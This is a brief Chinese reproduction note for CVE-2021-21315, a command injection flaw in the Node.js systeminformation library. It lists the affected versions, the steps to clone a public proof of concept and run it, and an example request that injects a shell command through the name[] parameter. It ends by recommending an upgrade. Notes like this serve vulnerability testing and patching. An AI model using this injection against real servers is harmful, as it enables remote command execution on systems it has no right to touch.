漏洞简介 Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息。 2021年02月24日,npm团队发布安全公告,Node.js库中的systeminformation软件包中存在一个命令注入漏洞CVE-2021-21315,攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令,最终获取服务器最高权限。
影响版本
Systeminformation < 5.3.1
下载poc
git clone https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC.git
nodejs开启http
node index.js
http://192.168.1.192:23854/api/getServices?name[]=$(echo%20-e%20%E2%80%98NULL%E2%80%99%20%3E%201.txt)
修复:
升级到安全版本